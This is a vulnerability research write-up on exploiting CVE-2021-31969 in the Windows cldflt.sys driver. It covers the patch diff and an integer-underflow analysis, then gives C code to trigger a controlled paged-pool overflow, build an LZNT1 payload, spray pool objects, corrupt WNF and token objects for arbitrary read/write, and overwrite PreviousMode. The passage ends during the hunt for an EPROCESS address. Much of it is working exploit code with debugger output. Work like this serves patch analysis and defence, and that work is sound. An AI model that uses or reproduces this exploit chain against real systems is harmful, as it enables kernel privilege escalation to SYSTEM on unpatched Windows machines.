Introduction

The prevalence of memory corruption bugs persists, posing a persistent challenge for exploitation. This increased difficulty arises from advancements in defensive mechanisms and the escalating complexity of software systems. While a basic proof of concept often suffices for bug patching, the development of a functional exploit capable of bypassing existing countermeasures provides valuable insights into the capabilities of advanced threat actors. This holds particularly true for the scrutinized driver, cldflt.sys, which has consistently received patches every Patch Tuesday since June. Notably, it has become a focal point for threat actors, following the exploits on clfs.sys and afd.sys drivers. In this article, we aim to highlight the significance of cldflt.sys and advocate for increased research into this driver and its associated components.

Now turning to the specific vulnerability, CVE-2021-31969 initially appears challenging to exploit due to its restrictive nature. However, by manipulating the paged pool, it is feasible to elevate a seemingly isolated pool overflow into a comprehensive arbitrary read/write scenario. This exploit grants elevated access, allowing the attainment of a shell as SYSTEM.

Description

Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability

Affected Versions

  • Windows 10 1809-21H2
  • Windows Server 2019

Patch Diff

OS: Windows 10 1809
Binary: cldflt.sys

Before Patch

Version: KB5003217
Hash: 316016b70cd25ad43a0710016c85930616fe85ebd69350386f6b3d3060ec717e

  v7 = *(_DWORD *)(a1 + 8);
  someSize = HIWORD(v7);
  if ( !_bittest((const int *)&v7, 0xFu) )
  {
    *a3 = a1;
    return (unsigned int)v3;
  }
  allocatedSize = someSize + 8;
  allocatedMem = ExAllocatePoolWithTag(PagedPool, someSize + 8, 'pRsH');
  allocatedMemRef = allocatedMem;
  if ( !allocatedMem )
  {
    LODWORD(v3) = -1073741670;
    goto LABEL_3;
  }
  *(_QWORD *)allocatedMem = *(_QWORD *)a1;
  *((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
  v3 = (unsigned int)RtlDecompressBuffer(
                       COMPRESSION_FORMAT_LZNT1,
                       (PUCHAR)allocatedMem + 12,// uncompressed_buffer
                       allocatedSize - 12,      // uncompressed_buffer_size
                       (PUCHAR)(a1 + 12),
                       a2 - 12,
                       (PULONG)va);

After Patch

Version: KB5003646
Hash: 5cef11352c3497b881ac0731e6b2ae4aab6add1e3107df92b2da46b2a61089a9

    someSize = *(_WORD *)(a1 + 10);
    if ( someSize >= 4u )
    {
      if ( (*(_DWORD *)(a1 + 8) & 0x8000) == 0 )
      {
        *a3 = a1;
        return (unsigned int)status;
      }
      allocatedSize = someSize + 8;
      allocatedMem = ExAllocatePoolWithTag(PagedPool, allocatedSize, 'pRsH');
      allocatedMemRef = allocatedMem;
      if ( !allocatedMem )
      {
        LODWORD(status) = 0xC000009A;
        goto LABEL_3;
      }
      *(_QWORD *)allocatedMem = *(_QWORD *)a1;
      *((_DWORD *)allocatedMem + 2) = *(_DWORD *)(a1 + 8);
      status = (unsigned int)RtlDecompressBuffer(
                               COMPRESSION_FORMAT_LZNT1,
                               (PUCHAR)allocatedMem + 12,// uncompressed_buffer
                               allocatedSize - 12,// uncompressed_buffer_size
                               (PUCHAR)(a1 + 12),
                               a2 - 12,
                               (PULONG)va);

Bug Analysis

The introduced patch incorporates a validation mechanism to guarantee a minimum value of 4 for the variable someSize.

Preceding the application of this patch, the variable someSize lacked a lower limit of 4, potentially resulting in a scenario where the variable allocatedSize could fall below 12. Consequently, instances arose where the UncompressedBufferSize parameter supplied to the RtlDecompressBuffer function assumed negative values, triggering an unsigned integer underflow that cyclically wraps around to 0xFFFFFFF4.

Based on the LZNT1 Specification, the first WORD in the compressed buffer is a header, which contains metadata such as whether the buffer is compressed and its size.

The compressed data is contained in a single chunk. The chunk header, interpreted as a 16-bit value, is 0xB038. Bit 15 is 1, so the chunk is compressed; bits 14 through 12 are the correct signature value (3); and bits 11 through 0 are decimal 56, so the chunk is 59 bytes in size.

Since the header is user controllable, it is possible to mark the buffer as uncompressed.
This leads to RtlDecompressBuffer behaving like memcpy.
With size and data under user control, a controlled paged-pool overflow is possible.

Structures

Variable a1 shown above is a REPARSE_DATA_BUFFER type.

typedef struct _REPARSE_DATA_BUFFER {
  ULONG  ReparseTag;
  USHORT ReparseDataLength;
  USHORT Reserved;
  struct {
    UCHAR DataBuffer[1];
  } GenericReparseBuffer;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;

GenericReparseBuffer.DataBuffer contains custom data set by the filter driver.

struct cstmData
{
  WORD flag;
  WORD cstmDataSize;
  UCHAR compressedBuffer[1];
};

The first WORD is a flag, followed by a size that influences pool allocation, and finally the compressed buffer passed to RtlDecompressBuffer.

This data is stored inside the directory’s reparse tag, and will be retrieved and decompressed under various conditions mentioned below.

HsmpRpReadBuffer:

v9 = (unsigned int)FltFsControlFile(
                       Instance,
                       FileObject,
                       FSCTL_GET_REPARSE_POINT,
                       0i64,
                       0,
                       reparseData,
                       0x4000u,
                       0i64);

...

status = HsmpRpiDecompressBuffer(reparseData, reparseDataSize, someOut);

Triggering Bug

On a fresh copy of Windows 10 1809, the minifilter is not attached to any drives by default.

Registration is required to attach it.

HRESULT RegisterAndConnectSyncRoot(LPCWSTR Path, CF_CONNECTION_KEY *Key)
{
    HRESULT                  status = S_OK;
    CF_SYNC_REGISTRATION     reg = { sizeof(CF_SYNC_REGISTRATION) };
    CF_SYNC_POLICIES         pol = { sizeof(CF_SYNC_POLICIES) };
    CF_CALLBACK_REGISTRATION table[1] = { CF_CALLBACK_REGISTRATION_END };

    reg.ProviderName = L"HackProvider";
    reg.ProviderVersion = L"99";

    pol.Hydration.Primary = CF_HYDRATION_POLICY_FULL;
    pol.Population.Primary = CF_POPULATION_POLICY_FULL;
    pol.PlaceholderManagement = CF_PLACEHOLDER_MANAGEMENT_POLICY_CONVERT_TO_UNRESTRICTED;

    if ((status = CfRegisterSyncRoot(Path, &reg, &pol, 0)) == S_OK)
        status = CfConnectSyncRoot(Path, table, 0, CF_CONNECT_FLAG_NONE, Key);

    return status;
}

Now it will respond to filesystem actions through its registered pre/post op handlers.

By profiling the handlers and tracing with proximity view, we can find some paths that may trigger the decompression: Operations such as converting a file to a placeholder, obtaining(creating) a file handle or renaming a file could lead to decompression.

As an example, this is the callstack when obtaining a handle to a file inside a syncroot directory:

4: kd> k
 # Child-SP          RetAddr               Call Site
00 ffff8689`7915cf78 fffff807`5505722b     cldflt!HsmpRpiDecompressBuffer
01 ffff8689`7915cf80 fffff807`5503e4b2     cldflt!HsmpRpReadBuffer+0x267
02 ffff8689`7915cff0 fffff807`5505fd29     cldflt!HsmpSetupContexts+0x27a
03 ffff8689`7915d120 fffff807`5505fea9     cldflt!HsmiFltPostECPCREATE+0x47d
04 ffff8689`7915d1c0 fffff807`52a3442e     cldflt!HsmFltPostCREATE+0x9
05 ffff8689`7915d1f0 fffff807`52a33cf3     FLTMGR!FltpPerformPostCallbacks+0x32e
14: kd> dt _FILE_OBJECT @rdx
ntdll!_FILE_OBJECT
   +0x000 Type             : 0n5
   +0x002 Size             : 0n216
   +0x008 DeviceObject     : 0xffff8687`c43a8c00 _DEVICE_OBJECT
   +0x010 Vpb              : 0xffff8687`c43f69a0 _VPB
   +0x018 FsContext        : 0xffff9985`38f8e6f0 Void
   +0x020 FsContext2       : 0xffff9985`36ff4a00 Void
   +0x028 SectionObjectPointer : (null) 
   +0x030 PrivateCacheMap  : (null) 
   +0x038 FinalStatus      : 0n0
   +0x040 RelatedFileObject : (null) 
   +0x048 LockOperation    : 0 ''
   +0x049 DeletePending    : 0 ''
   +0x04a ReadAccess       : 0x1 ''
   +0x04b WriteAccess      : 0 ''
   +0x04c DeleteAccess     : 0 ''
   +0x04d SharedRead       : 0x1 ''
   +0x04e SharedWrite      : 0x1 ''
   +0x04f SharedDelete     : 0x1 ''
   +0x050 Flags            : 0x40002
   +0x058 FileName         : _UNICODE_STRING "\Windows\Temp\hax\vuln"
   +0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
   +0x070 Waiters          : 0
   +0x074 Busy             : 1
   +0x078 LastLock         : (null) 
   +0x080 Lock             : _KEVENT
   +0x098 Event            : _KEVENT
   +0x0b0 CompletionContext : (null) 
   +0x0b8 IrpListLock      : 0
   +0x0c0 IrpList          : _LIST_ENTRY [ 0xffff8e85`b1dc0910 - 0xffff8e85`b1dc0910 ]
   +0x0d0 FileObjectExtension : (null) 

This means we can write arbitrary reparse data into a created directory inside syncroot and obtain a handle to it in order to trigger the pool overflow.

CreateDirectoryW(OverwriteDir, NULL);

hOverwrite = CreateFileW(
        OverwriteDir,
        GENERIC_ALL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_BACKUP_SEMANTICS,
        NULL
    );

status = DeviceIoControl(
        hOverwrite,
        FSCTL_SET_REPARSE_POINT_EX,
        newReparseData,
        newSize,
        NULL,
        0,
        &returned,
        NULL
    );

CloseHandle(hOverWrite);

// Trigger Bug
hOverwrite = CreateFileW(
        OverwriteDir,
        GENERIC_ALL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_BACKUP_SEMANTICS,
        NULL
    );

FSCTL_SET_REPARSE_POINT_EX is used because the driver registered a pre-op handler for FSCTL_SET_REPARSE_POINT which denies our request.

if ( v2->Parameters.FileSystemControl.Buffered.InputBufferLength >= 4
    && (Context && (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0
     || (*(_DWORD *)v2->Parameters.FileSystemControl.Buffered.SystemBuffer & 0xFFFF0FFF) == dword_1E4F0) )
  {
    if ( Context )
    {
      v3 = *((_QWORD *)Context + 2);
      v4 = *(_QWORD *)(*(_QWORD *)(v3 + 16) + 32i64);
    }
    HsmDbgBreakOnStatus(0xC000CF18);
    if ( WPP_GLOBAL_Control != (PDEVICE_OBJECT)&WPP_GLOBAL_Control
      && (HIDWORD(WPP_GLOBAL_Control->Timer) & 1) != 0
      && BYTE1(WPP_GLOBAL_Control->Timer) >= 2u )
    {
      WPP_SF_qqqd(
        WPP_GLOBAL_Control->AttachedDevice,
        17i64,
        &WPP_7c63b6f3d9f33043309d9f605c648752_Traceguids,
        Context,
        v3,
        v4,
        0xC000CF18);
    }
    a1->IoStatus.Information = 0i64;
    v7 = 4;
    a1->IoStatus.Status = 0xC000CF18;
  }

The check lies in (*(_DWORD *)(*((_QWORD *)Context + 2) + 0x1Ci64) & 1) != 0.
Context is not under user control, hence this call will always fail.

As mentioned above, we can control the compressed buffer contents to make RtlDecompressBuffer behave like memcpy.

    // controlled size, controlled content overflow!
    *(WORD *)&payload[0] = 0x8000; // pass flag check
    *(WORD *)&payload[2] = 0x0; // size to trigger underflow
    *(WORD *)&payload[4] = 0x30-1; // lznt1 header: uncompressed, 0x30 size
    memset(&payload[6], 'B', 0x100);

This specific reparse buffer leads to a 0x20 sized allocation in the paged pool.

1: kd> !pool @rax
Pool page ffff9f0ab3547090 region is Paged pool
 ffff9f0ab3547000 size:   60 previous size:    0  (Free)       ....
 ffff9f0ab3547060 size:   20 previous size:    0  (Allocated)  Via2
*ffff9f0ab3547080 size:   20 previous size:    0  (Allocated) *HsRp
		Owning component : Unknown (update pooltag.txt)
 ffff9f0ab35470a0 size:   20 previous size:    0  (Allocated)  Ntfo
 ffff9f0ab35470c0 size:   20 previous size:    0  (Allocated)  ObNm
 ffff9f0ab35470e0 size:   20 previous size:    0  (Allocated)  PsJb
 ffff9f0ab3547100 size:   20 previous size:    0  (Allocated)  VdPN
 ffff9f0ab3547120 size:   20 previous size:    0  (Allocated)  Via2

However the crafted LZNT1 header will result in 0x30 Bs being copied to memory starting from an offset of 0xC for a pool allocation that can only hold 0x10 bytes of user data, therefore causing an overflow of 0x2C bytes, corrupting neighbouring chunks and eventually causing a BSOD.

4: kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x0000007e
                       (0xFFFFFFFFC0000005,0xFFFFF804044ED09A,0xFFFFDA8F76595748,0xFFFFDA8F76594F90)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

The content and size of overflow is fully under our control, whereas the allocated chunk is fixed at 0x20 bytes.

Restrictions

We only get one chance to overflow so we’ll wish for an object that can perform both read and write.

On modern Windows, pool allocations smaller than 0x200 bytes is managed by the Low Fragmentation Heap(LFH) if it’s active. For common sizes like 0x20, the LFH bucket for it is undoubtedly activated by the time the exploit commences. Under control of the LFH, the vulnerable chunk will only be positioned adjacent to other 0x20 sized chunks in the same bucket, which prevents the easy way of overflowing into an adjacent powerful object like WNF to improve the primitive. Furthermore, finding a 0x20 sized object to achieve both arbitrary read and write is difficult, because a 0x20 sized allocation can only really hold 0x10 bytes of data.

Improving Primitive

Before proceeding with exploitation, it’s important to fully understand the primitive at hand. For an overflow that invovles exploring its maximum possible size.

Although it may seem like the maximum size we can specify in the LZNT1 header is only 0xFFF, that’s only for one compressed chunk.

typedef struct
{
    WORD Size;
    BYTE Data[4096];
} LZNT1Chunk;

Each structure above describes a page-sized chunk.
By allocating multiple structures, we can write up to 0xFFFFFFFF bytes with RtlDecompressBuffer.

void CreatePayload(PBYTE *CreatedPayload)
{
    WORD       *payload = NULL;
    LZNT1Chunk *buf = NULL;
    DWORD      remaining = OVERFLOW_SIZE;
    DWORD      pagesToOverflow = 0;
    DWORD      effectiveSize = 0;

    pagesToOverflow = (remaining % PAGE_SIZE) ? (remaining / PAGE_SIZE) + 1 : (remaining / PAGE_SIZE);

    payload = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LZNT1Chunk) * pagesToOverflow + 4); // metadata
    if (!payload) {
        printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
        return;
    }

    payload[0] = 0x8000; // pass flag check
    payload[1] = 0; // trigger integer underflow

    buf = (ULONG64)payload + 4;

    for (int i = 0; i < pagesToOverflow; i++) {
        if (remaining >= PAGE_SIZE)
            buf[i].Size = PAGE_SIZE - 1;
        else
            buf[i].Size = remaining - 1;

        effectiveSize = buf[i].Size + 1;
        for (int j = 0; j < effectiveSize / sizeof(DWORD); j++)
            ((DWORD *)(&buf[i].Data))[j] = PAGE_SIZE; // spray 0x1000 values

        remaining -= PAGE_SIZE;
    }

    *CreatedPayload = payload;
    return;
}

However, recall that the HsmpRpReadBuffer function only retrieves up to 0x4000 bytes of reparse data, including headers. This leaves us with a maximum of less than 4 pages to overflow.

Exploitation Thoughts

The only logical way is still to overflow into an object that grants us more control, which is probably of another size. With about 4 pages of data to write, maybe we can write past the LFH completely? Maybe into another subsegment?

By allocating a large amount of 0x20 chunks in the paged pool, we get to exhaust all currently available 0x20 LFH buckets. When that happens, the backend allocator allocates a new segment for some new LFH buckets.

At the same time, we allocate a large amount of _WNF_STATE_DATA and _TOKEN objects adjacent to each other in the same page. This will hopefully exhaust all currently available VS subsegments, forcing the frontend allocator to allocate new VS subsegments.

Different subsegment types(LFH/VS) can be contiguous in pool memory. This means if we’re lucky(and spray enough), we can end up with a LFH bucket adjacent to a VS subsegment in memory.

If there are less than 4 pages of LFH buckets between the victim chunk and a VS subsegment, we can overflow into the VS subsegment and gain control over the WNF and TOKEN objects residing there.

The overflow data will consist of DWORDS with value 0x1000. The goal is to overwrite _WNF_STATE_DATA->AllocatedSize and _WNF_STATE_DATA->DataSize with 0x1000, giving us relative page read/write primitive which we’ll use to manipulate the _TOKEN object right after it.

LFH Pool Spray

There exists an object named _TERMINATION_PORT that leads to a 0x20 sized allocation and can be freely allocated.

//0x10 bytes (sizeof)
struct _TERMINATION_PORT
{
    struct _TERMINATION_PORT* Next;                                         //0x0
    VOID* Port;                                                             //0x8
}; 

By invoking NtRegisterThreadTerminatePort with an ALPC(LPC) Port object, we can allocate an instance of _TERMINATION_PORT in the paged pool.

void SprayTerminationPort(DWORD *Count)
{
    ALPC_PORT_ATTRIBUTES    alpcAttr = { 0 };
    OBJECT_ATTRIBUTES       objAttr = { 0 };
    HANDLE                  hConnPort = NULL;
    UNICODE_STRING          uPortName = { 0 };
    NTSTATUS                status = STATUS_SUCCESS;

    RtlInitUnicodeString(&uPortName, L"\\RPC Control\\My ALPC Test Port");
    InitializeObjectAttributes(&objAttr, &uPortName, 0, NULL, NULL);
    
    alpcAttr.MaxMessageLength = AlpcMaxAllowedMessageLength();

    status = NtAlpcCreatePort(&hConnPort, &objAttr, &alpcAttr);
    if (!NT_SUCCESS(status)) {
        printf("[-] NtAlpcCreatePort Error: 0x%08X\n", status);
        return;
    }

    for (int i = 0; i < *Count; i++)
        NtRegisterThreadTerminatePort(hConnPort);

    printf("[+] Sprayed 0x%lx _TERMINATION_PORT objects\n", *Count);

    g_TerminationPortSprayDone = 1;
    while (!g_FreeTerminationPortObjects)
        Sleep(1500);

    return;
}

This object will be tagged onto the current thread’s _ETHREAD object and will be freed when the thread terminates.

Post Overflow

All steps to perform a controlled overflow are detailed above. Assuming we have successfully overflown into a VS subsegment, what are the next steps?

It’s a good sign if the OS hasn’t crashed by the time we finish overflowing. It at least means we did not write into unmapped memory. By querying all WNF chunks, we can find chunks that are successfully overwritten.

int WnfFindUsableCorruptedChunk(DWORD WnfObjectSize)
{
    WNF_CHANGE_STAMP stamp = 0;
    BYTE             buf[PAGE_SIZE];
    DWORD            bufSize = WnfObjectSize;
    DWORD            wnfToTokenOffset = WnfObjectSize + 0x50;
    NTSTATUS         status = STATUS_SUCCESS;

    for (int i = 0; i < g_WnfCount; i++) {
        status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
        bufSize = WnfObjectSize;
        if (status != STATUS_BUFFER_TOO_SMALL)
            continue;
        
        printf("[*] Found corrupted chunk: 0x%lx\n", i);
        bufSize = PAGE_SIZE;
        status = NtQueryWnfStateData(&g_Statenames[i], NULL, NULL, &stamp, &buf, &bufSize);
        if (!NT_SUCCESS(status)) {
            puts("something weird");
            printf("0x%08X\n", status);
            continue;
        }

        if (*(DWORD *)((ULONG64)buf + wnfToTokenOffset) == 0x1000)
            continue;

        printf("[*] Found usable chunk: 0x%lx\n", i);
        return i;
    }

    return -1;
}

First perform a query with the initial DataSize allocated. Objects that are not overflown will respond without error, but objects that have their DataSize enlarged to 0x1000 will return STATUS_BUFFER_TOO_SMALL.

Now we check if we are able to use this object for exploitation.
The criteria is an untouched _TOKEN object after it.

To identify the target _TOKEN object by its handle, we can allocate two arrays prior to spraying to store all handles and IDs.

BOOL TokenAllocateObject(void)
{
    BOOL             status = TRUE;
    HANDLE           hOriginal = NULL;
    DWORD            returnLen = 0;
    TOKEN_STATISTICS stats = { 0 };

    status = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hOriginal);
    if (!status) {
        printf("[-] OpenProcessToken fail: 0x%08x\n", GetLastError());
        hOriginal = NULL;
        goto out;
    }

    // Allocates a _TOKEN object in kernel pool
    status = DuplicateTokenEx(hOriginal, MAXIMUM_ALLOWED, NULL, SECURITY_ANONYMOUS, TokenPrimary, &g_Tokens[g_TokenCount]);
    if (!status) {
        printf("[-] DuplicateTokenEx fail: 0x%08x\n", GetLastError());
        status = FALSE;
        goto out;
    }

    status = GetTokenInformation(g_Tokens[g_TokenCount], TokenStatistics, &stats, sizeof(TOKEN_STATISTICS), &returnLen);
    if (!status) {
        printf("[-] GetTokenInformation fail: 0x%08x\n", GetLastError());
        status = FALSE;
        goto out;
    }

    g_TokenIds[g_TokenCount] = stats.TokenId.LowPart; // High part is always 0

    g_TokenCount++;

out:
    if (hOriginal)
        CloseHandle(hOriginal);

    return status;
}

Relative read with WNF allows us to extract the TokenId member in pool memory and identify its corresponding handle.

Arbitrary Read/Write

The _TOKEN object contains many pointers we can modify to gain arbitrary read/write using Win32 APIs.

Arbitrary Read

NtQueryInformationToken:

case TokenBnoIsolation:
        }
        if ( Token->BnoIsolationHandlesEntry )
        {
          *((_BYTE *)TokenInformation + 8) = 1;
          *(_QWORD *)TokenInformation = (char *)TokenInformation + 16;
          memmove(
            (char *)TokenInformation + 16,
            Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
            Token->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
        }

By setting Token->BnoIsolationHandlesEntry to a usermode buffer, we can forge fields for EntryDescriptor.IsolationPrefix.Buffer and EntryDescriptor.IsolationPrefix.MaximumLength.
The data will be copied to TokenInformation + 16, which is another usermode buffer we supply to the API.

Arbitrary Write

NtSetInformationToken:

This function calls into SepAppendDefaultDacl if we specify TokenDefaultDacl as TokenInformationClass

void *__fastcall SepAppendDefaultDacl(_TOKEN *Token, unsigned __int16 *UserBuffer)
{
  int v3; // edi
  _ACL *v4; // rbx
  void *result; // rax

  v3 = UserBuffer[1];
  v4 = (_ACL *)&Token->DynamicPart[*(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2];
  result = memmove(v4, UserBuffer, UserBuffer[1]);
  Token->DynamicAvailable -= v3;
  Token->DefaultDacl = v4;
  return result;
}

By pointing Token->PrimaryGroup to one byte before memory that contains a null, we can make *(unsigned __int8 *)(Token->PrimaryGroup + 1) + 2 equal to 2.
We can’t make it 0 because it’s an unsigned byte operation zero-extended to 64-bits, as shown by the assembly:

movzx   r8d, byte ptr [rax+1]
mov     rax, [rcx+0B0h]
add     rax, 8
lea     rbx, [rax+r8*4]

Then we can set DynamicPart to arbitrary address - 0x8 and gain arbitrary write.

There’s a catch though.
DynamicPart and PrimaryGroup should point to the same address, otherwise there will be an unwanted memmove corrupting memory.

SepFreeDefaultDacl:

  DynamicPart = TokenObject->DynamicPart;
  PrimaryGroup = (unsigned __int8 *)TokenObject->PrimaryGroup;
  if ( DynamicPart != (unsigned int *)PrimaryGroup )
  {
    memmove(DynamicPart, PrimaryGroup, 4i64 * PrimaryGroup[1] + 8);
    result = (__int64)TokenObject->DynamicPart;
    TokenObject->PrimaryGroup = result;
  }

To make things more restrictive, UserBuffer[1] used as size field must also be at least 0x8, which means the size field will clobber two bytes of the write destination.

UserBuffer is also casted as an ACL and has to pass ACL checks.

//0x8 bytes (sizeof)
struct _ACL
{
    UCHAR AclRevision;                                                      //0x0
    UCHAR Sbz1;                                                             //0x1
    USHORT AclSize;                                                         //0x2
    USHORT AceCount;                                                        //0x4
    USHORT Sbz2;                                                            //0x6
}; 

That restricts the value of the AclRevision member between 2 and 4.

if ( (unsigned __int8)(Acl->AclRevision - 2) <= 2u )

AclCount should also be 0 to bypass further checks.
The final buffer written should look like this:

0x2   0x0    0x8    0x0    0x0     0x0     0x0      0x0
Rev   Sbz1   Sz-1   Sz-2   Cnt-1   Cnt-2   Sbz2-1   Sbz2-2

This is not a great primitive, but should still allow us to null out the PreviousMode field of our exploit thread due to the naturally occuring memory layout in that region.

More specifically, we can point both DynamicPart and PrimaryGroup to _KTHREAD+0x229.

5: kd> dq  0xffffb186051c8378-0x2f8+0x229
ffffb186`051c82a9  00000000`000000ff 40010000`00090100
ffffb186`051c82b9  ff000000`00000000 00000000`000000ff
ffffb186`051c82c9  05000000`0f010000 00000000`00000000
ffffb186`051c82d9  00000000`00000000 00000000`00000000
ffffb186`051c82e9  00000000`00000000 00000000`00000000
ffffb186`051c82f9  00000000`00000000 12000000`00100000
ffffb186`051c8309  80000000`00065800 00ffffb1`86051c80
ffffb186`051c8319  00000000`00000000 70000000`00000000

PrimaryGroup+1 will then point to null, copying the fake ACL to _KTHREAD+0x2b1 and allowing the 0x0 from Sbz1 to overwrite PreviousMode.

This has a side effect of setting the BasePriority of the thread to 0x8(THREAD_PRIORITY_BELOW_NORMAL), which isn’t too bad.

Armed with arbitrary read and the ability to null out PreviousMode once we locate it, the greatest hurdle has been overcame. All that’s required is to find the address of the exploit thread’s PreviousMode member.

Hunting EPROCESS

Most escalation techniques, including this, require us to locate an EPROCESS structure in kernel memory. Once we locate an arbitrary EPROCESS, we can go through its ActiveProcessLinks member to hunt for the exploit process as well as a system process.

On Windows versions before Windows 11 Build 25915, we can use the well known NtQuery* APIs to leak kernel addresses, including our own EPROCESS address.

Since this will no longer work soon and we already have a flexible arbitrary read primitive, I’m looking for other ways to leak an EPROCESS address.

There are many ways to leak EPROCESS, such as reading the PsInitialSystemProcess global variable or bruteforcing kernel address space.
I’ll show a shortcut to leaking an EPROCESS address from a known _TOKEN object.

While browsing through members of the _TOKEN object which we can already leak from the WNF relative read, we can find a SessionObject member that points to a chunk that resides in the non-paged 0xB0 LFH bucket.

12: kd> !pool 0xffff9788`30cf3bd0
Pool page ffff978830cf3bd0 region is Nonpaged pool
 ffff978830cf3000 size:   50 previous size:    0  (Free)       ....
 ffff978830cf3050 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf3100 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf31b0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf3260 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf3310 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf33c0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3470 size:   b0 previous size:    0  (Allocated)  WPLg
 ffff978830cf3520 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf35d0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf3680 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf3730 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf37e0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3890 size:   b0 previous size:    0  (Allocated)  ITrk
 ffff978830cf3940 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf39f0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3aa0 size:   b0 previous size:    0  (Allocated)  inte
*ffff978830cf3b50 size:   b0 previous size:    0  (Allocated) *Sess
		Owning component : Unknown (update pooltag.txt)
 ffff978830cf3c00 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf3cb0 size:   b0 previous size:    0  (Allocated)  MmMl
 ffff978830cf3d60 size:   b0 previous size:    0  (Allocated)  PFXM
 ffff978830cf3e10 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3ec0 size:   b0 previous size:    0  (Allocated)  inte

If we browse the pool allocations around it, we can find many AlIn tagged allocations.

12: kd> !pool 0xffff9788`30cf4000
Pool page ffff978830cf4000 region is Nonpaged pool
 ffff978830cf4020 size:   b0 previous size:    0  (Allocated)  Sess
 ffff978830cf40d0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf4180 size:   b0 previous size:    0  (Allocated)  WPLg
 ffff978830cf4230 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf42e0 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf4390 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf4440 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf44f0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf45a0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf4650 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4700 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf47b0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4860 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4910 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf49c0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4a70 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4b20 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4bd0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4c80 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4d30 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4de0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4e90 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4f40 size:   b0 previous size:    0  (Allocated)  AlIn

These allocations seem to always locate close to SessionObject, and are abundant.

I do not know what datatype this allocation is, so I used windbg to dump pointers within it.

12: kd> .foreach (addr {dps ffff978830cf4c80 La0}) {!object addr}

ffff8f8ed1576618: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
4: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978830cf4cf8: Not a valid object (ObjectType invalid)
Object: ffff978832c67380  Type: (ffff978830805e60) IoCompletion
    ObjectHeader: ffff978832c67350 (new version)
    HandleCount: 1  PointerCount: 32748
264ffe62090: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978832728420: Not a valid object (ObjectType invalid)
ffff978830cf4c90: Not a valid object (ObjectType invalid)
ffff978830cf4cc8: Not a valid object (ObjectType invalid)

At allocation+0x38 holds a pointer to an IoCompletion object, which I again have no idea regarding its type. Viewing pool layout around it shows that it’s being surrounded by many EtwR objects consistently.

7: kd> !pool ffffd685bcbeb7c0 
Pool page ffffd685bcbeb7c0 region is Nonpaged pool
 ffffd685bcbeb000 size:   50 previous size:    0  (Free)       ....
 ffffd685bcbeb050 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb130 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb210 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb2f0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb3d0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb4b0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb590 size:   e0 previous size:    0  (Allocated)  EtwR
